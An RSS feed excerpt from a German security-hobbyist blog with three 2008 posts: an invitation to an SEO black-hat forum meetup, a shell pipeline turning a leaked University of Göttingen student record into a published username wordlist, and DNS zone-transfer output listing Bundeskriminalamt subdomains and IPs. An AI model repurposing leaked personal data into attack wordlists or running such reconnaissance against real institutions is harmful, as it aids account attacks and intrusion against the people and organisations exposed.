<blockquote><p>The following SEO Black Hat Forum members have been hand selected to get a <strong>free Invite to SEO de Janeiro</strong> (a 5000 euro value!) based on their ongoing helpful contributions:</p>
<p>Gotan Raider<br />
Insomniac<br />
countzero<br />
markus<br />
Paladin<br />
<a href="http://alexf.name/2008-11-18/rio-de-zhanejro/">alexf2000</a><br />
Brad101<br />
stefanjuhl<br />
alf<br />
smaxor<br />
Cygnus</p></blockquote>
<p>Laut dem <a href="http://seoblackhat.com/2008/10/08/seo-de-janerio/">Guide zur Veranstaltung</a> soll es diesmal neben den versprochenen <strong>30 brasilianischen Models</strong> auch <strong>Hang Gliding</strong>, <strong>Jetski</strong> und <strong>Kajakfahren</strong> UND sogar einige <strong>kleinere Alkoholfreie Drinks</strong> geben <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>Natürlich wird es bestimmt auch sehr nett, den ganzen Nicknames ein Gesicht zuzuordnen, und bei <strong>5000 Euro Startgeld</strong> &#8211; oder in meinem Fall etwas in der <a href="http://www.seoblackhat.com/forum/">Community Partizipieren</a> &#8211; bin ich mir sicher, dass auch Leute kommen von denen selbst ich *hust* noch was lernen kann.</p>
<p>Diese kleine Party soll also übers Wochenende vom <strong>20. bis zum 23. Februar in Rio de Janeiro</strong> starten, und ich plane eigentlich, von <strong>Frankfurt</strong> aus zu fliegen. Wer von euch ist denn auch bei der <strong>SEO de Janeiro</strong> dabei? Es wäre echt toll, wenn man durch ein wenig Koordination auf einmal <strong>nebeneinander im Flugzeug sitzt</strong> oder gar <strong>das gleiche Hotel gebucht hat</strong> <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Natürlich werde ich für<strong> mich</strong>, meine <strong>liebenswerten Mitmenschen</strong> und vor allem für dich, meinen <strong>treuen Leser</strong>, der natürlich nicht weniger liebenswert ist, alles so gut wie möglich auf <strong>Speicherkarten</strong> bannen. Ist ja für mich immerhin die erste Reise nach Südamerika, hey ho lets go!!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/168/eine-reise-nach-brasilien-seo-de-janeiro/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Datenpanne der Universität Göttingen: Meine Wordlist</title>
		<link>http://blog.bf-itservice.de/101/datenpanne-der-universitat-gottingen-meine-wordlist</link>
		<comments>http://blog.bf-itservice.de/101/datenpanne-der-universitat-gottingen-meine-wordlist#comments</comments>
		<pubDate>Thu, 02 Oct 2008 12:41:45 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Fehlerteufel]]></category>
		<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[Leak]]></category>
		<category><![CDATA[studenten]]></category>
		<category><![CDATA[universität göttingen]]></category>
		<category><![CDATA[userlist]]></category>
		<category><![CDATA[wordlist]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=101</guid>
		<description><![CDATA[Nachdem ich in unzähligen Berichten über den LDAP-Datengau der Universität Göttingen gelesen habe und mich die Benutzerliste auf Wikileaks.org so angelächelt hat, dachte ich mir das ganze kann man ja auch zu etwas positiven Benutzen. Der ganze Fusel wurde also heruntergeladen und durch grep -v ^# students.txt &#124; sed -e &#8220;s/\s\+//g;s/\.-\(.*\)//g;s/[^A-Za-z]//g&#8221; &#124; grep -v &#8220;^$&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>Nachdem ich in <a href="http://netzpolitik.org/2008/datenleck-mit-26000-studenten-datensaetzen-bei-der-uni-goettingen/">unzähligen</a> <a href="http://www.golem.de/0810/62744.html">Berichten</a> über den <strong>LDAP-Datengau der Universität Göttingen</strong> gelesen habe und mich die Benutzerliste auf Wikileaks.org so <a href="http://www.wikileaks.org/leak/complete-student-record-university-of-goettingen.txt">angelächelt</a> hat, dachte ich mir das ganze kann man ja auch zu etwas positiven Benutzen.</p>
<p>Der ganze Fusel wurde also heruntergeladen und durch</p>
<blockquote><p>grep -v ^# students.txt | sed -e &#8220;s/\s\+//g;s/\.-\(.*\)//g;s/[^A-Za-z]//g&#8221; | grep -v &#8220;^$&#8221; | awk &#8216;{if (length($0) &gt; 4 &amp;&amp; length($0) &lt; 13) print $0 }&#8217; | uniq</p></blockquote>
<p>in ein brauchbares Format gebracht, vielleicht kann das ja der ein oder andere außer mir gebrauchen.</p>
<p>Ich war so frei diese Userliste auf den Namen <a href="http://blog.bf-itservice.de/wp-content/uploads/2008/10/students_length_5_to_12txt.uniq">Uni Göttingen Studenten-Userlist</a> zu taufen. <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_surprised.gif' alt=':o' class='wp-smiley' /> )</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/101/datenpanne-der-universitat-gottingen-meine-wordlist/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Die Hashdatenbank des BKA</title>
		<link>http://blog.bf-itservice.de/78/die-hashdatenbank-des-bka</link>
		<comments>http://blog.bf-itservice.de/78/die-hashdatenbank-des-bka#comments</comments>
		<pubDate>Wed, 17 Sep 2008 14:20:02 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[bka]]></category>
		<category><![CDATA[dns zone transfer]]></category>
		<category><![CDATA[hashdatenbank]]></category>
		<category><![CDATA[hashdb.bka.de]]></category>
		<category><![CDATA[subdomain]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=78</guid>
		<description><![CDATA[Ich bin heute über einen fehlkonfigurierten Nameserver eines Hosters des deutschen Bundeskriminalamtes auf eine nette Subdomain dieser Institution gestoßen, der einen vielversprechenden Namen hat: hashdb.bka.de. Gut, ein geglückter Zone Transfer ist keine Meisterleistung, und mit den Informationen kann man auch nicht mehr anfangen, als einen Blogpost zu schreiben, aber ich vermute dass hashdb.bka.de (193.175.83.72) noch [...]]]></description>
			<content:encoded><![CDATA[<p>Ich bin heute über einen <strong>fehlkonfigurierten Nameserver</strong> eines Hosters des deutschen <strong>Bundeskriminalamtes</strong> auf eine nette Subdomain dieser Institution gestoßen, der einen vielversprechenden Namen hat: <strong>hashdb.bka.de</strong>. <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Gut, ein geglückter <strong>Zone Transfer</strong> ist keine Meisterleistung, und mit den Informationen kann man auch nicht mehr anfangen, als einen Blogpost zu schreiben, aber ich vermute dass <strong>hashdb.bka.de (193.175.83.72) </strong>noch einigen Menschen negativ in Erfahrung bleiben wird.</p>
<p>Von außen ist der Host leider nicht erreichbar, ich befürchte das macht mich aber nur <strong>noch</strong> neugieriger als zuvor *verschwörungsuch* <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_surprised.gif' alt=':o' class='wp-smiley' /> )</p>
<p>Anbei die vollständigen Ergebnisse des Scans, etwas anonymisiert weil ein miskonfigurierter DNS ja in den besten Häusern vorkommen soll.</p>
<blockquote><p>bka.de.    7200    IN    SOA    dns.xxxxx.de. hostmaster.xxxxx.de. (<br />
2008091700    ; Serial<br />
86400    ; Refresh<br />
7200    ; Retry<br />
604800    ; Expire<br />
7200 )    ; Minimum TTL<br />
bka.de.    7200    IN    NS    dns.xxxxx.de.<br />
bka.de.    7200    IN    NS    secondary.xxxxx.de.<br />
bka.de.    7200    IN    NS    secondary.xxxxx.de.<br />
bka.de.    7200    IN    A    62.156.153.38<br />
bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.<br />
bka.de.    7200    IN    TXT    &#8220;Created by update.named 3.6a&#8221;<br />
oa.bka.de.    7200    IN    A    62.156.153.38<br />
oa.bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.<br />
www.infopool-polizeikonzepte.bka.de.    7200    IN    A    77.87.229.218<br />
iuk.bka.de.    7200    IN    A    62.156.153.38<br />
iuk.bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.<br />
www.bka.de.    7200    IN    A    62.156.153.38<br />
<strong>hashdb.bka.de.    7200    IN    A    193.175.83.72</strong><br />
st.bka.de.    7200    IN    A    62.156.153.38<br />
st.bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.<br />
infodok.bka.de.    7200    IN    A    77.87.229.206<br />
*.bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.<br />
tesit.bka.de.    7200    IN    A    62.156.153.38<br />
tesit.bka.de.    7200    IN    MX    100 smtp.ts-businessmail.de.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/78/die-hashdatenbank-des-bka/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
